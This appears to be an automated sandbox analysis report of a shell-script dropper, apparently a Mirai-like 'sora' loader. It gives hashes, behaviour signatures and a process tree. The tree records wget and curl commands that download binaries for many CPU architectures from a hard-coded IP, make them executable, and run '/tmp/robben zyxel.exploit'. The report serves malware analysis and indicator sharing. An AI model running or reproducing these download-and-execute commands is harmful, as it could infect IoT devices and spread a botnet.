Analysis
max time kernel: 31s
max time network: 29s
platform: debian-9_mipsel
resource: debian9-mipsel-20240611-en
resource tags: arch:mipsel, image:debian9-mipsel-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted: 18/10/2024, 03:03
Static task: static1
Behavioral task behavioral1: sample ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh, resource ubuntu1804-amd64-20240611-en
Behavioral task behavioral2: sample ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh, resource debian9-armhf-20240418-en
Behavioral task behavioral3: sample ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh, resource debian9-mipsbe-20240418-en
Behavioral task behavioral4: sample ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh, resource debian9-mipsel-20240611-en
General
Target: ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
Size: 2KB
MD5: eb7a4e59f642cd5475876f6ef1a09d3a
SHA1: 9232db0ebfe888067cc85a32b786a7ce41be0a6f
SHA256: ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670
SHA512: 9393df90cc409e4f6ee6a2fc7df960123823ca22c25f01ae4e2ab094f74f71f0565925aa0384a5e84f4b15792d89317af71b1f223fa7fdd340b4404f9a25c6b8
Malware Config
Signatures
File and Directory Permissions Modification (1 TTPs, 14 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Process chmod, PIDs: 748, 772, 835, 725, 735, 760, 841, 754, 803, 822, 742, 788, 847, 856
Executes dropped EXE (14 IoCs)
IoC /tmp/robben, process robben, PIDs: 726, 736, 743, 749, 755, 761, 773, 789, 805, 824, 836, 842, 848, 857
File opened for reading /proc/sys/crypto/fips_enabled by curl (14 occurrences; tagged in the process tree as "Reads runtime system information")
System Network Configuration Discovery (1 TTPs, 3 IoCs)
Adversaries may gather information about the network configuration of a system.
PIDs: 728 wget, 732 curl, 734 cat
Writes file to tmp directory (1 IoCs)
Malware often drops required files in the /tmp directory.
File opened for modification /tmp/robben by ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
Processes
- /tmp/ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh (PID 700): /tmp/ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh [Writes file to tmp directory]
  - /usr/bin/wget (PID 704): wget http://93.123.85.141/bins/sora.x86
  - /usr/bin/curl (PID 713): curl -O http://93.123.85.141/bins/sora.x86 [Reads runtime system information]
  - /bin/cat (PID 723): cat sora.x86
  - /bin/chmod (PID 725): chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-lugVr6 [File and Directory Permissions Modification]
  - /tmp/robben (PID 726): ./robben zyxel.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 728): wget http://93.123.85.141/bins/sora.mips [System Network Configuration Discovery]
  - /usr/bin/curl (PID 732): curl -O http://93.123.85.141/bins/sora.mips [Reads runtime system information; System Network Configuration Discovery]
  - /bin/cat (PID 734): cat sora.mips [System Network Configuration Discovery]
  - /bin/chmod (PID 735): chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-lugVr6 [File and Directory Permissions Modification]
  - /tmp/robben (PID 736): ./robben zyxel.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 738): wget http://93.123.85.141/bins/sora.x86_64
  - /usr/bin/curl (PID 740): curl -O http://93.123.85.141/bins/sora.x86_64 [Reads runtime system information]
  - /bin/cat (PID 741): cat sora.x86_64
  - /bin/chmod (PID 742): chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-lugVr6 [File and Directory Permissions Modification]
  - /tmp/robben (PID 743): ./robben zyxel.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 745): wget http://93.123.85.141/bins/sora.i468
  - /usr/bin/curl (PID 746): curl -O http://93.123.85.141/bins/sora.i468 [Reads runtime system information]
  - /bin/cat (PID 747): cat sora.i468
  - /bin/chmod (PID 748): chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-lugVr6 [File and Directory Permissions Modification]
  - /tmp/robben (PID 749): ./robben zyxel.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 751): wget http://93.123.85.141/bins/sora.i686
  - /usr/bin/curl (PID 752): curl -O http://93.123.85.141/bins/sora.i686 [Reads runtime system information]
  - /bin/cat (PID 753): cat sora.i686
  - /bin/chmod (PID 754): chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-lugVr6 [File and Directory Permissions Modification]
  - /tmp/robben (PID 755): ./robben zyxel.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 757): wget http://93.123.85.141/bins/sora.mpsl
  - /usr/bin/curl (PID 758): curl -O http://93.123.85.141/bins/sora.mpsl [Reads runtime system information]
  - /bin/cat (PID 759): cat sora.mpsl
  - /bin/chmod (PID 760): chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-lugVr6 [File and Directory Permissions Modification]
  - /tmp/robben (PID 761): ./robben zyxel.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 763): wget http://93.123.85.141/bins/sora.arm4
  - /usr/bin/curl (PID 764): curl -O http://93.123.85.141/bins/sora.arm4 [Reads runtime system information]
  - /bin/cat (PID 770): cat sora.arm4
  - /bin/chmod (PID 772): chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-lugVr6 [File and Directory Permissions Modification]
  - /tmp/robben (PID 773): ./robben zyxel.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 776): wget http://93.123.85.141/bins/sora.arm5
  - /usr/bin/curl (PID 780): curl -O http://93.123.85.141/bins/sora.arm5 [Reads runtime system information]
  - /bin/cat (PID 785): cat sora.arm5
  - /bin/chmod (PID 788): chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-lugVr6 [File and Directory Permissions Modification]
  - /tmp/robben (PID 789): ./robben zyxel.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 791): wget http://93.123.85.141/bins/sora.arm6
  - /usr/bin/curl (PID 795): curl -O http://93.123.85.141/bins/sora.arm6 [Reads runtime system information]
  - /bin/cat (PID 801): cat sora.arm6
  - /bin/chmod (PID 803): chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-lugVr6 [File and Directory Permissions Modification]
  - /tmp/robben (PID 805): ./robben zyxel.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 807): wget http://93.123.85.141/bins/sora.arm7
  - /usr/bin/curl (PID 811): curl -O http://93.123.85.141/bins/sora.arm7 [Reads runtime system information]
  - /bin/cat (PID 821): cat sora.arm7
  - /bin/chmod (PID 822): chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-lugVr6 [File and Directory Permissions Modification]
  - /tmp/robben (PID 824): ./robben zyxel.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 827): wget http://93.123.85.141/bins/sora.ppc
  - /usr/bin/curl (PID 831): curl -O http://93.123.85.141/bins/sora.ppc [Reads runtime system information]
  - /bin/cat (PID 834): cat sora.ppc
  - /bin/chmod (PID 835): chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-lugVr6 [File and Directory Permissions Modification]
  - /tmp/robben (PID 836): ./robben zyxel.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 838): wget http://93.123.85.141/bins/sora.ppc440fp
  - /usr/bin/curl (PID 839): curl -O http://93.123.85.141/bins/sora.ppc440fp [Reads runtime system information]
  - /bin/cat (PID 840): cat sora.ppc440fp
  - /bin/chmod (PID 841): chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-lugVr6 [File and Directory Permissions Modification]
  - /tmp/robben (PID 842): ./robben zyxel.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 844): wget http://93.123.85.141/bins/sora.m68k
  - /usr/bin/curl (PID 845): curl -O http://93.123.85.141/bins/sora.m68k [Reads runtime system information]
  - /bin/cat (PID 846): cat sora.m68k
  - /bin/chmod (PID 847): chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-lugVr6 [File and Directory Permissions Modification]
  - /tmp/robben (PID 848): ./robben zyxel.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 850): wget http://93.123.85.141/bins/sora.sh4
  - /usr/bin/curl (PID 851): curl -O http://93.123.85.141/bins/sora.sh4 [Reads runtime system information]
  - /bin/cat (PID 855): cat sora.sh4
  - /bin/chmod (PID 856): chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben [File and Directory Permissions Modification]
  - /tmp/robben (PID 857): ./robben zyxel.exploit [Executes dropped EXE]